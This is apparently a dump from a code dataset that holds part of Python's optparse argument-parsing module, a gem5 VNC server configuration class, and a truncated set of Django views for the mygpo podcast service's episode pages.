getattr(builtins, self.type.__name__, None) is self.type) ):
self.type = self.type.__name__
if self.type == "str":
self.type = "string"
if self.type not in self.TYPES:
raise OptionError("invalid option type: %r" % self.type, self)
if self.action not in self.TYPED_ACTIONS:
raise OptionError(
"must not supply a type for action %r" % self.action, self)
def _check_choice(self):
if self.type == "choice":
if self.choices is None:
raise OptionError(
"must supply a list of choices for type 'choice'", self)
elif not isinstance(self.choices, (tuple, list)):
raise OptionError(
"choices must be a list of strings ('%s' supplied)"
% str(type(self.choices)).split("'")[1], self)
elif self.choices is not None:
raise OptionError(
"must not supply choices for type %r" % self.type, self)
def _check_dest(self):
# No destination given, and we need one for this action. The
# self.type check is for callbacks that take a value.
takes_value = (self.action in self.STORE_ACTIONS or
self.type is not None)
if self.dest is None and takes_value:
# Glean a destination from the first long option string,
# or from the first short option string if no long options.
if self._long_opts:
# eg. "--foo-bar" -> "foo_bar"
self.dest = self._long_opts[0][2:].replace('-', '_')
else:
self.dest = self._short_opts[0][1]
def _check_const(self):
if self.action not in self.CONST_ACTIONS and self.const is not None:
raise OptionError(
"'const' must not be supplied for action %r" % self.action,
self)
def _check_nargs(self):
if self.action in self.TYPED_ACTIONS:
if self.nargs is None:
self.nargs = 1
elif self.nargs is not None:
raise OptionError(
"'nargs' must not be supplied for action %r" % self.action,
self)
def _check_callback(self):
if self.action == "callback":
if not callable(self.callback):
raise OptionError(
"callback not callable: %r" % self.callback, self)
if (self.callback_args is not None and
not isinstance(self.callback_args, tuple)):
raise OptionError(
"callback_args, if supplied, must be a tuple: not %r"
% self.callback_args, self)
if (self.callback_kwargs is not None and
not isinstance(self.callback_kwargs, dict)):
raise OptionError(
"callback_kwargs, if supplied, must be a dict: not %r"
% self.callback_kwargs, self)
else:
if self.callback is not None:
raise OptionError(
"callback supplied (%r) for non-callback option"
% self.callback, self)
if self.callback_args is not None:
raise OptionError(
"callback_args supplied for non-callback option", self)
if self.callback_kwargs is not None:
raise OptionError(
"callback_kwargs supplied for non-callback option", self)
CHECK_METHODS = [_check_action,
_check_type,
_check_choice,
_check_dest,
_check_const,
_check_nargs,
_check_callback]
# -- Miscellaneous methods -----------------------------------------
def __str__(self):
return "/".join(self._short_opts + self._long_opts)
__repr__ = _repr
def takes_value(self):
return self.type is not None
def get_opt_string(self):
if self._long_opts:
return self._long_opts[0]
else:
return self._short_opts[0]
# -- Processing methods --------------------------------------------
def check_value(self, opt, value):
checker = self.TYPE_CHECKER.get(self.type)
if checker is None:
return value
else:
return checker(self, opt, value)
def convert_value(self, opt, value):
if value is not None:
if self.nargs == 1:
return self.check_value(opt, value)
else:
return tuple([self.check_value(opt, v) for v in value])
def process(self, opt, value, values, parser):
# First, convert the value(s) to the right type. Howl if any
# value(s) are bogus.
value = self.convert_value(opt, value)
# And then take whatever action is expected of us.
# This is a separate method to make life easier for
# subclasses to add new actions.
return self.take_action(
self.action, self.dest, opt, value, values, parser)
def take_action(self, action, dest, opt, value, values, parser):
if action == "store":
setattr(values, dest, value)
elif action == "store_const":
setattr(values, dest, self.const)
elif action == "store_true":
setattr(values, dest, True)
elif action == "store_false":
setattr(values, dest, False)
elif action == "append":
values.ensure_value(dest, []).append(value)
elif action == "append_const":
values.ensure_value(dest, []).append(self.const)
elif action == "count":
setattr(values, dest, values.ensure_value(dest, 0) + 1)
elif action == "callback":
args = self.callback_args or ()
kwargs = self.callback_kwargs or {}
self.callback(self, opt, value, parser, *args, **kwargs)
elif action == "help":
parser.print_help()
parser.exit()
elif action == "version":
parser.print_version()
parser.exit()
else:
raise ValueError("unknown action %r" % self.action)
return 1
# class Option
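# Illustrative sketch, not part of the original module: constructing an
# Option directly, as OptionParser.add_option() does internally:
#   opt = Option("-n", "--count", action="store", type="int",
#                dest="count", default=1, help="repeat N times")
#   opt.takes_value()     # True, because type is not None
#   opt.get_opt_string()  # "--count"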
SUPPRESS_HELP = "SUPPRESS"+"HELP"
SUPPRESS_USAGE = "SUPPRESS"+"USAGE"
class Values:
def __init__(self, defaults=None):
if defaults:
for (attr, val) in defaults.items():
setattr(self, attr, val)
def __str__(self):
return str(self.__dict__)
__repr__ = _repr
def __eq__(self, other):
if isinstance(other, Values):
return self.__dict__ == other.__dict__
elif isinstance(other, dict):
return self.__dict__ == other
else:
return NotImplemented
def _update_careful(self, dict):
"""
Update the option values from an arbitrary dictionary, but only
use keys from dict that already have a corresponding attribute
in self. Any keys in dict without a corresponding attribute
are silently ignored.
"""
for attr in dir(self):
if attr in dict:
dval = dict[attr]
if dval is not None:
setattr(self, attr, dval)
def _update_loose(self, dict):
"""
Update the option values from an arbitrary dictionary,
using all keys from the dictionary regardless of whether
they have a corresponding attribute in self or not.
"""
self.__dict__.update(dict)
def _update(self, dict, mode):
if mode == "careful":
self._update_careful(dict)
elif mode == "loose":
self._update_loose(dict)
else:
raise ValueError("invalid update mode: %r" % mode)
def read_module(self, modname, mode="careful"):
__import__(modname)
mod = sys.modules[modname]
self._update(vars(mod), mode)
def read_file(self, filename, mode="careful"):
namespace = {}  # avoid shadowing the vars() builtin
with open(filename) as f:
exec(f.read(), namespace)  # read and close the file promptly
self._update(namespace, mode)
def ensure_value(self, attr, value):
if not hasattr(self, attr) or getattr(self, attr) is None:
setattr(self, attr, value)
return getattr(self, attr)
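# Illustrative sketch, not part of the original module: the two update
# modes of Values differ in whether unknown keys are kept:
#   v = Values({"color": "red"})
#   v._update({"color": "blue", "shape": "round"}, "careful")
#   # v.color == "blue"; "shape" is silently ignored
#   v._update({"shape": "round"}, "loose")
#   # now v.shape == "round"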
class OptionContainer:
"""
Abstract base class.
Class attributes:
standard_option_list : [Option]
list of standard options that will be accepted by all instances
of this parser class (intended to be overridden by subclasses).
Instance attributes:
option_list : [Option]
the list of Option objects contained by this OptionContainer
_short_opt : { string : Option }
dictionary mapping short option strings, eg. "-f" or "-X",
to the Option instances that implement them. If an Option
has multiple short option strings, it will appear in this
dictionary multiple times. [1]
_long_opt : { string : Option }
dictionary mapping long option strings, eg. "--file" or
"--exclude", to the Option instances that implement them.
Again, a given Option can occur multiple times in this
dictionary. [1]
defaults : { string : any }
dictionary mapping option destination names to default
values for each destination [1]
[1] These mappings are common to (shared by) all components of the
controlling OptionParser, where they are initially created.
"""
def __init__(self, option_class, conflict_handler, description):
# Initialize the option list and related data structures.
# This method must be provided by subclasses, and it must
# initialize at least the following instance attributes:
# option_list, _short_opt, _long_opt, defaults.
self._create_option_list()
self.option_class = option_class
self.set_conflict_handler(conflict_handler)
self.set_description(description)
def _create_option_mappings(self):
# For use by OptionParser constructor -- create the master
# option mappings used by this OptionParser and all
# OptionGroups that it owns.
self._short_opt = {} # single letter -> Option instance
self._long_opt = {} # long option -> Option instance
self.defaults = {} # maps option dest -> default value
def _share_option_mappings(self, parser):
# For use by OptionGroup constructor -- use shared option
# mappings from the OptionParser that owns this OptionGroup.
self._short_opt = parser._short_opt
self._long_opt = parser._long_opt
self.defaults = parser.defaults
def set_conflict_handler(self, handler):
if handler not in ("error", "resolve"):
raise ValueError("invalid conflict_resolution value %r" % handler)
self.conflict_handler = handler
def set_description(self, description):
self.description = description
def get_description(self):
return self.description
def destroy(self):
"""see OptionParser.destroy()."""
del self._short_opt
del self._long_opt
del self.defaults
# -- Option-adding methods -----------------------------------------
def _check_conflict(self, option):
conflict_opts = []
for opt in option._short_opts:
if opt in self._short_opt:
conflict_opts.append((opt, self._short_opt[opt]))
for opt in option._long_opts:
if opt in self._long_opt:
conflict_opts.append((opt, self._long_opt[opt]))
if conflict_opts:
handler = self.conflict_handler
if handler == "error":
raise OptionConflictError(
"conflicting option string(s): %s"
% ", ".join([co[0] for co in conflict_opts]),
option)
elif handler == "resolve":
for (opt, c_option) in conflict_opts:
if opt.startswith("--"):
c_option._long_opts.remove(opt)
del self._long_opt[opt]
else:
c_option._short_opts.remove(opt)
del self._short_opt[opt]
if not (c_option._short_opts or c_option._long_opts):
c_option.container.option_list.remove(c_option)
def add_option(self, *args, **kwargs):
"""add_option(Option)
add_option(opt_str, ..., kwarg=val, ...)
"""
if isinstance(args[0], str):
option = self.option_class(*args, **kwargs)
elif len(args) == 1 and not kwargs:
option = args[0]
if not isinstance(option, Option):
raise TypeError("not an Option instance: %r" % option)
else:
raise TypeError("invalid arguments")
self._check_conflict(option)
self.option_list.append(option)
option.container = self
for opt in option._short_opts:
self._short_opt[opt] = option
for opt in option._long_opts:
self._long_opt[opt] = option
if option.dest is not None: # option has a dest, we need a default
if option.default is not NO_DEFAULT:
self.defaults[option.dest] = option.default
elif option.dest not in self.defaults:
self.defaults[option.dest] = None
return option
def add_options(self, option_list):
for option in option_list:
self.add_option(option)
# -- Option query/removal methods ----------------------------------
def get_option(self, opt_str):
return (self._short_opt.get(opt_str) or
self._long_opt.get(opt_str))
def has_option(self, opt_str):
return (opt_str in self._short_opt or
opt_str in self._long_opt)
def remove_option(self, opt_str):
option = self._short_opt.get(opt_str)
if option is None:
option = self._long_opt.get(opt_str)
if option is None:
raise ValueError("no such option %r" % opt_str)
for opt in option._short_opts:
del self._short_opt[opt]
for opt in option._long_opts:
del self._long_opt[opt]
option.container.option_list.remove(option)
# -- Help-formatting methods ---------------------------------------
def format_option_help(self, formatter):
if not self.option_list:
return ""
result = []
for option in self.option_list:
if option.help is not SUPPRESS_HELP:
result.append(formatter.format_option(option))
return "".join(result)
def format_description(self, formatter):
return formatter.format_description(self.get_description())
def format_help(self, formatter):
result = []
if self.description:
result.append(self.format_description(formatter))
if self.option_list:
result.append(self.format_option_help(formatter))
return "\n".join(result)
class OptionGroup (OptionContainer):
def __init__(self, parser, title, description=None):
self.parser = parser
OptionContainer.__init__(
self, parser.option_class, parser.conflict_handler, description)
self.title = title
def _create_option_list(self):
self.option_list = []
self._share_option_mappings(self.parser)
def set_title(self, title):
self.title = title
def destroy(self):
"""see OptionParser.destroy()."""
OptionContainer.destroy(self)
del self.option_list
# -- Help-formatting methods ---------------------------------------
def format_help(self, formatter):
result = formatter.format_heading(self.title)
formatter.indent()
result += OptionContainer.format_help(self, formatter)
formatter.dedent()
return result
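# Illustrative sketch, not part of the original module: grouping options
# purely for help output, as described above (names assumed):
#   group = OptionGroup(parser, "Debug Options", "Use these with care.")
#   group.add_option("--trace", action="store_true", dest="trace")
#   parser.add_option_group(group)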
class OptionParser (OptionContainer):
"""
Class attributes:
standard_option_list : [Option]
list of standard options that will be accepted by all instances
of this parser class (intended to be overridden by subclasses).
Instance attributes:
usage : string
a usage string for your program. Before it is displayed
to the user, "%prog" will be expanded to the name of
your program (self.prog or os.path.basename(sys.argv[0])).
prog : string
the name of the current program (to override
os.path.basename(sys.argv[0])).
description : string
A paragraph of text giving a brief overview of your program.
optparse reformats this paragraph to fit the current terminal
width and prints it when the user requests help (after usage,
but before the list of options).
epilog : string
paragraph of help text to print after option help
option_groups : [OptionGroup]
list of option groups in this parser (option groups are
irrelevant for parsing the command-line, but very useful
for generating help)
allow_interspersed_args : bool = true
if true, positional arguments may be interspersed with options.
Assuming -a and -b each take a single argument, the command-line
-ablah foo bar -bboo baz
will be interpreted the same as
-ablah -bboo -- foo bar baz
If this flag were false, that command line would be interpreted as
-ablah -- foo bar -bboo baz
-- ie. we stop processing options as soon as we see the first
non-option argument. (This is the tradition followed by
Python's getopt module, Perl's Getopt::Std, and other argument-
parsing libraries, but it is generally annoying to users.)
process_default_values : bool = true
if true, option default values are processed similarly to option
values from the command line: that is, they are passed to the
type-checking function for the option's type (as long as the
default value is a string). (This really only matters if you
have defined custom types; see SF bug #955889.) Set it to false
to restore the behaviour of Optik 1.4.1 and earlier.
rargs : [string]
the argument list currently being parsed. Only set when
parse_args() is active, and continually trimmed down as
we consume arguments. Mainly there for the benefit of
callback options.
largs : [string]
the list of leftover arguments that we have skipped while
parsing options. If allow_interspersed_args is false, this
list is always empty.
values : Values
the set of option values currently being accumulated. Only
set when parse_args() is active. Also mainly for callbacks.
Because of the 'rargs', 'largs', and 'values' attributes,
OptionParser is not thread-safe. If, for some perverse reason, you
need to parse command-line arguments simultaneously in different
threads, use different OptionParser instances.
"""
standard_option_list = []
def __init__(self,
usage=None,
option_list=None,
option_class=Option,
version=None,
conflict_handler="error",
description=None,
formatter=None,
add_help_option=True,
prog=None,
epilog=None):
OptionContainer.__init__(
self, option_class, conflict_handler, description)
self.set_usage(usage)
self.prog = prog
self.version = version
self.allow_interspersed_args = True
self.process_default_values = True
if formatter is None:
formatter = IndentedHelpFormatter()
self.formatter = formatter
self.formatter.set_parser(self)
self.epilog = epilog
# Populate the option list; initial sources are the
# standard_option_list class attribute, the 'option_list'
# argument, and (if applicable) the _add_version_option() and
# _add_help_option() methods.
self._populate_option_list(option_list,
add_help=add_help_option)
self._init_parsing_state()
def destroy(self):
"""
Declare that you are done with this OptionParser. This cleans up
reference cycles so the OptionParser (and all objects referenced by
it) can be garbage-collected promptly. After calling destroy(), the
OptionParser is unusable.
"""
OptionContainer.destroy(self)
for group in self.option_groups:
group.destroy()
del self.option_list
del self.option_groups
del self.formatter
# -- Private methods -----------------------------------------------
# (used by our or OptionContainer's constructor)
def _create_option_list(self):
self.option_list = []
self.option_groups = []
self._create_option_mappings()
def _add_help_option(self):
self.add_option("-h", "--help",
action="help",
help=_("show this help message and exit"))
def _add_version_option(self):
self.add_option("--version",
action="version",
help=_("show program's version number and exit"))
def _populate_option_list(self, option_list, add_help=True):
if self.standard_option_list:
self.add_options(self.standard_option_list)
if option_list:
self.add_options(option_list)
if self.version:
self._add_version_option()
if add_help:
self._add_help_option()
def _init_parsing_state(self):
# These are set in parse_args() for the convenience of callbacks.
self.rargs = None
self.largs = None
self.values = None
# -- Simple modifier methods ---------------------------------------
def set_usage(self, usage):
if usage is None:
self.usage = _("%prog [options]")
elif usage is SUPPRESS_USAGE:
self.usage = None
# For backwards compatibility with Optik 1.3 and earlier.
elif usage.lower().startswith("usage: "):
self.usage = usage[7:]
else:
self.usage = usage
def enable_interspersed_args(self):
"""Set parsing to not stop on the first non-option, allowing
interspersing switches with command arguments. This is the
default behavior. See also disable_interspersed_args() and the
class documentation description of the attribute
allow_interspersed_args."""
self.allow_interspersed_args = True
def disable_interspersed_args(self):
"""Set parsing to stop on the first non-option. Use this if
you have a command processor which runs another command that
has options of its own and you want to make sure these options
don't get confused.
"""
self.allow_interspersed_args = False
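# Illustrative sketch, not part of the original module: with interspersed
# args disabled, parsing stops at the first positional argument:
#   parser.disable_interspersed_args()
#   opts, args = parser.parse_args(["-v", "run", "-x"])
#   # args == ["run", "-x"]; "-x" is left over rather than parsed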
def set_process_default_values(self, process):
self.process_default_values = process
def set_default(self, dest, value):
self.defaults[dest] = value
def set_defaults(self, **kwargs):
self.defaults.update(kwargs)
def _get_all_options(self):
options = self.option_list[:]
for group in self.option_groups:
options.extend(group.option_list)
return options
def get_default_values(self):
if not self.process_default_values:
# Old, pre-Optik 1.5 behaviour.
return Values(self.defaults)
defaults = self.defaults.copy()
for option in self._get_all_options():
default = defaults.get(option.dest)
if isinstance(default, str):
opt_str = option.get_opt_string()
defaults[option.dest] = option.check_value(opt_str, default)
return Values(defaults)
# -- OptionGroup methods -------------------------------------------
def add_option_group(self, *args, **kwargs):
# XXX lots of overlap with OptionContainer.add_option()
if isinstance(args[0], str):
group = OptionGroup(self, *args, **kwargs)
elif len(args) == 1 and not kwargs:
group = args[0]
if not isinstance(group, OptionGroup):
raise TypeError("not an OptionGroup instance: %r" % group)
if group.parser is not self:
raise ValueError("invalid OptionGroup (wrong parser)")
else:
raise TypeError("invalid arguments")
self.option_groups.append(group)
return group
def get_option_group(self, opt_str):
option = (self._short_opt.get(opt_str) or
self._long_opt.get(opt_str))
if option and option.container is not self:
return option.container
return None
# -- Option-parsing methods ----------------------------------------
def _get_args(self, args):
if args is None:
return sys.argv[1:]
else:
return args[:] # don't modify caller's list
def parse_args(self, args=None, values=None):
"""
parse_args(args : [string] = sys.argv[1:],
values : Values = None)
-> (values : Values, args : [string])
Parse the command-line options found in 'args' (default:
sys.argv[1:]). Any errors result in a call to 'error()', which
by default prints the usage message to stderr and calls
sys.exit() with an error message. On success returns a pair
(values, args) where 'values' is a Values instance (with all
your option values) and 'args' is the list of arguments left
over after parsing options.
"""
rargs = self._get_args(args)
if values is None:
values = self.get_default_values()
# Store the halves of the argument list as attributes for the
# convenience of callbacks:
# rargs
# the rest of the command-line (the "r" stands for
# "remaining" or "right-hand")
# largs
# the leftover arguments -- ie. what's left after removing
# options and their arguments (the "l" stands for "leftover"
# or "left-hand")
self.rargs = rargs
self.largs = largs = []
self.values = values
try:
stop = self._process_args(largs, rargs, values)
except (BadOptionError, OptionValueError) as err:
self.error(str(err))
args = largs + rargs
return self.check_values(values, args)
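# Illustrative sketch, not part of the original module: typical end-to-end
# use of the parser defined above:
#   parser = OptionParser(usage="%prog [options] FILE")
#   parser.add_option("-v", "--verbose", action="store_true", dest="verbose")
#   options, args = parser.parse_args(["-v", "input.txt"])
#   # options.verbose == True, args == ["input.txt"]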
def check_values(self, values, args):
"""
check_values(values : Values, args : [string])
-> (values : Values, args : [string])
Check that the supplied option values and leftover arguments are
valid. Returns the option values and leftover arguments
(possibly adjusted, possibly completely new -- whatever you
like). Default implementation just returns the passed-in
values; subclasses may override as desired.
"""
return (values, args)
def _process_args(self, largs, rargs, values):
"""_process_args(largs : [string],
rargs : [string],
values : Values)
Process command-line arguments and populate 'values', consuming
options and arguments from 'rargs'. If 'allow_interspersed_args' is
false, stop at the first non-option argument. If true, accumulate any
interspersed non-option arguments in 'largs'.
"""
while rargs:
arg = rargs[0]
# We handle bare "--" explicitly, and bare "-" is handled by the
# standard arg handler since the short arg case ensures that the
# len of the opt string is greater than 1.
if arg == "--":
del rargs[0]
return
elif arg[0:2] == "--":
# process a single long option (possibly with value(s))
self._process_long_opt(rargs, values)
elif arg[:1] == "-" and len(arg) > 1:
# process a cluster of short options (possibly with
# value(s) for the last one only)
self._process_short_opts(rargs, values)
elif self.allow_interspersed_args:
largs.append(arg)
del rargs[0]
else:
return # stop now, leave this arg in rargs
# Say this is the original argument list:
# [arg0, arg1, ..., arg(i-1), arg(i), arg(i+1), ..., arg(N-1)]
# ^
# (we are about to process arg(i)).
#
# Then rargs is [arg(i), ..., arg(N-1)] and largs is a *subset* of
# [arg0, ..., arg(i-1)] (any options and their arguments will have
# been removed from largs).
#
# The while loop will usually consume 1 or more arguments per pass.
# If it consumes 1 (eg. arg is an option that takes no arguments),
# then after _process_arg() is done the situation is:
#
# largs = subset of [arg0, ..., arg(i)]
# rargs = [arg(i+1), ..., arg(N-1)]
#
# If allow_interspersed_args is false, largs will always be
# *empty* -- still a subset of [arg0, ..., arg(i-1)], but
# not a very interesting subset!
def _match_long_opt(self, opt):
"""_match_long_opt(opt : string) -> string
Determine which long option string 'opt' matches, ie. which one
it is an unambiguous abbreviation for. Raises BadOptionError if
'opt' doesn't unambiguously match any long option string.
"""
return _match_abbrev(opt, self._long_opt)
def _process_long_opt(self, rargs, values):
arg = rargs.pop(0)
# Value explicitly attached to arg? Pretend it's the next
# argument.
if "=" in arg:
(opt, next_arg) = arg.split("=", 1)
rargs.insert(0, next_arg)
had_explicit_value = True
else:
opt = arg
had_explicit_value = False
opt = self._match_long_opt(opt)
option = self._long_opt[opt]
if option.takes_value():
nargs = option.nargs
if len(rargs) < nargs:
self.error(ngettext(
"%(option)s option requires %(number)d argument",
"%(option)s option requires %(number)d arguments",
nargs) % {"option": opt, "number": nargs})
elif nargs == 1:
value = rargs.pop(0)
else:
value = tuple(rargs[0:nargs])
del rargs[0:nargs]
elif had_explicit_value:
self.error(_("%s option does not take a value") % opt)
else:
value = None
option.process(opt, value, values, self)
def _process_short_opts(self, rargs, values):
arg = rargs.pop(0)
stop = False
i = 1
for ch in arg[1:]:
opt = "-" + ch
option = self._short_opt.get(opt)
i += 1 # we have consumed a character
if not option:
raise BadOptionError(opt)
if option.takes_value():
# Any characters left in arg? Pretend they're the
# next arg, and stop consuming characters of arg.
if i < len(arg):
rargs.insert(0, arg[i:])
stop = True
nargs = option.nargs
if len(rargs) < nargs:
self.error(ngettext(
"%(option)s option requires %(number)d argument",
"%(option)s option requires %(number)d arguments",
nargs) % {"option": opt, "number": nargs})
elif nargs == 1:
value = rargs.pop(0)
else:
value = tuple(rargs[0:nargs])
del rargs[0:nargs]
else: # option doesn't take a value
value = None
option.process(opt, value, values, self)
if stop:
break
# -- Feedback methods ----------------------------------------------
def get_prog_name(self):
if self.prog is None:
return os.path.basename(sys.argv[0])
else:
return self.prog
def expand_prog_name(self, s):
return s.replace("%prog", self.get_prog_name())
def get_description(self):
return self.expand_prog_name(self.description)
def exit(self, status=0, msg=None):
if msg:
sys.stderr.write(msg)
sys.exit(status)
def error(self, msg):
"""error(msg : string)
Print a usage message incorporating 'msg' to stderr and exit.
If you override this in a subclass, it should not return -- it
should either exit or raise an exception.
"""
self.print_usage(sys.stderr)
self.exit(2, "%s: error: %s\n" % (self.get_prog_name(), msg))
def get_usage(self):
if self.usage:
return self.formatter.format_usage(
self.expand_prog_name(self.usage))
else:
return ""
def print_usage(self, file=None):
"""print_usage(file : file = stdout)
Print the usage message for the current program (self.usage) to
'file' (default stdout). Any occurrence of the string "%prog" in
self.usage is replaced with the name of the current program
(basename of sys.argv[0]). Does nothing if self.usage is empty
or not defined.
"""
if self.usage:
print(self.get_usage(), file=file)
def get_version(self):
if self.version:
return self.expand_prog_name(self.version)
else:
return ""
def print_version(self, file=None):
"""print_version(file : file = stdout)
Print the version message for this program (self.version) to
'file' (default stdout). As with print_usage(), any occurrence
of "%prog" in self.version is replaced by the current program's
name. Does nothing if self.version is empty or undefined.
"""
if self.version:
print(self.get_version(), file=file)
def format_option_help(self, formatter=None):
if formatter is None:
formatter = self.formatter
formatter.store_option_strings(self)
result = []
result.append(formatter.format_heading(_("Options")))
formatter.indent()
if self.option_list:
result.append(OptionContainer.format_option_help(self, formatter))
result.append("\n")
for group in self.option_groups:
result.append(group.format_help(formatter))
result.append("\n")
formatter.dedent()
# Drop the last "\n", or the header if no options or option groups:
return "".join(result[:-1])
def format_epilog(self, formatter):
return formatter.format_epilog(self.epilog)
def format_help(self, formatter=None):
if formatter is None:
formatter = self.formatter
result = []
if self.usage:
result.append(self.get_usage() + "\n")
if self.description:
result.append(self.format_description(formatter) + "\n")
result.append(self.format_option_help(formatter))
result.append(self.format_epilog(formatter))
return "".join(result)
def print_help(self, file=None):
"""print_help(file : file = stdout)
Print an extended help message, listing all options and any
help text provided with them, to 'file' (default stdout).
"""
if file is None:
file = sys.stdout
file.write(self.format_help())
# class OptionParser
def _match_abbrev(s, wordmap):
"""_match_abbrev(s : string, wordmap : {string : Option}) -> string
Return the string key in 'wordmap' for which 's' is an unambiguous
abbreviation. If 's' is found to be ambiguous or doesn't match any of
the keys of 'wordmap', raise BadOptionError.
"""
# Is there an exact match?
if s in wordmap:
return s
else:
# Isolate all words with s as a prefix.
possibilities = [word for word in wordmap.keys()
if word.startswith(s)]
# No exact match, so there had better be just one possibility.
if len(possibilities) == 1:
return possibilities[0]
elif not possibilities:
raise BadOptionError(s)
else:
# More than one possible completion: ambiguous prefix.
possibilities.sort()
raise AmbiguousOptionError(s, possibilities)
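# Illustrative sketch, not part of the original module:
#   _match_abbrev("--ver", {"--verbose": opt_a, "--version": opt_b})
#   # raises AmbiguousOptionError; "--verb" would return "--verbose"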
# Some day, there might be many Option classes. As of Optik 1.3, the
# preferred way to instantiate Options is indirectly, via make_option(),
# which will become a factory function when there are many Option
# classes.
make_option = Option
| agpl-3.0 |
haowu4682/gem5 | src/base/vnc/Vnc.py | 66 | 2503 | # Copyright (c) 2010 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: William Wang
from m5.SimObject import SimObject
from m5.params import *
class VncInput(SimObject):
type = 'VncInput'
cxx_header = "base/vnc/vncinput.hh"
frame_capture = Param.Bool(False, "capture changed frames to files")
class VncServer(VncInput):
type = 'VncServer'
cxx_header = "base/vnc/vncserver.hh"
port = Param.TcpPort(5900, "listen port")
number = Param.Int(0, "vnc client number")
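# Illustrative sketch, not part of the original file: a gem5 configuration
# script would typically attach the server to a system object (the
# attribute name and values below are assumptions):
#   system.vncserver = VncServer(port=5901, frame_capture=True)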
| bsd-3-clause |
gpodder/mygpo | mygpo/podcasts/views/episode.py | 1 | 7048 | from datetime import datetime
from functools import wraps
import dateutil.parser
from django.shortcuts import render
from django.http import HttpResponseRedirect, Http404
from django.contrib.auth.decorators import login_required
from django.contrib.sites.requests import RequestSite
from django.contrib.contenttypes.models import ContentType
from django.views.decorators.vary import vary_on_cookie
from django.views.decorators.cache import never_cache, cache_control
from django.contrib import messages
from django.utils.translation import gettext as _
from mygpo.podcasts.models import Podcast, Episode
from mygpo.api.constants import EPISODE_ACTION_TYPES
from mygpo.utils import parse_time, get_timestamp
from mygpo.history.stats import last_played_episodes
from mygpo.publisher.utils import check_publisher_permission
from mygpo.web.utils import get_episode_link_target, check_restrictions
from mygpo.history.models import EpisodeHistoryEntry
from mygpo.favorites.models import FavoriteEpisode
from mygpo.userfeeds.feeds import FavoriteFeed
@vary_on_cookie
@cache_control(private=True)
def episode(request, episode):
podcast = episode.podcast
podcast = check_restrictions(podcast)
user = request.user
if not podcast:
raise Http404
if user.is_authenticated:
is_fav = FavoriteEpisode.objects.filter(user=user, episode=episode).exists()
# pre-populate data for fetch_data
podcasts_dict = {podcast.get_id(): podcast}
episodes_dict = {episode.id.hex: episode}
has_history = EpisodeHistoryEntry.objects.filter(
user=user, episode=episode
).exists()
devices = {c.id.hex: c for c in user.client_set.all()}
else:
has_history = False
is_fav = False
devices = {}
is_publisher = check_publisher_permission(user, podcast)
prev = None # podcast.get_episode_before(episode)
next = None # podcast.get_episode_after(episode)
return render(
request,
"episode.html",
{
"episode": episode,
"podcast": podcast,
"prev": prev,
"next": next,
"has_history": has_history,
"is_favorite": is_fav,
"actions": EPISODE_ACTION_TYPES,
"devices": devices,
"is_publisher": is_publisher,
},
)
@never_cache
@login_required
@vary_on_cookie
@cache_control(private=True)
def history(request, episode):
""" shows the history of the episode """
user = request.user
podcast = episode.podcast
history = (
EpisodeHistoryEntry.objects.filter(user=user, episode=episode)
.order_by("-timestamp")
.prefetch_related(
"episode",
"episode__slugs",
"episode__podcast",
"episode__podcast__slugs",
"client",
)
)
clients = user.client_set.all()
return render(
request,
"episode-history.html",
{
"episode": episode,
"podcast": podcast,
"history": history,
"actions": EPISODE_ACTION_TYPES,
"clients": clients,
},
)
@never_cache
@login_required
def toggle_favorite(request, episode):
user = request.user
fav, created = FavoriteEpisode.objects.get_or_create(user=user, episode=episode)
# if the episode was already a favorite, remove it
if not created:
fav.delete()
podcast = episode.podcast
return HttpResponseRedirect(get_episode_link_target(episode, podcast))
@vary_on_cookie
@cache_control(private=True)
@login_required
def list_favorites(request):
user = request.user
site = RequestSite(request)
favorites = FavoriteEpisode.episodes_for_user(user)
recently_listened = last_played_episodes(user)
favfeed = FavoriteFeed(user)
feed_url = favfeed.get_public_url(site.domain)
podcast = Podcast.objects.filter(urls__url=feed_url).first()
token = request.user.profile.favorite_feeds_token
return render(
request,
"favorites.html",
{
"episodes": favorites,
"feed_token": token,
"site": site,
"podcast": podcast,
"recently_listened": recently_listened,
},
)
@never_cache
def add_action(request, episode):
user = request.user
client = user.client_set.get(id=request.POST.get("device"))
action_str = request.POST.get("action")
timestamp = request.POST.get("timestamp", "")
if timestamp:
try:
timestamp = dateutil.parser.parse(timestamp)
except (ValueError, AttributeError, TypeError):
timestamp = datetime.utcnow()
else:
timestamp = datetime.utcnow()
EpisodeHistoryEntry.create_entry(user, episode, action_str, client, timestamp)
podcast = episode.podcast
return HttpResponseRedirect(get_episode_link_target(episode, podcast))
# To make all views accessible via either IDs or slugs,
# a decorator queries the episode and passes it on to the
# regular views
def slug_decorator(f):
@wraps(f)
def _decorator(request, p_slug, e_slug, *args, **kwargs):
pquery = Podcast.objects.filter(slugs__slug=p_slug, slugs__scope="")
try:
podcast = pquery.prefetch_related("slugs").get()
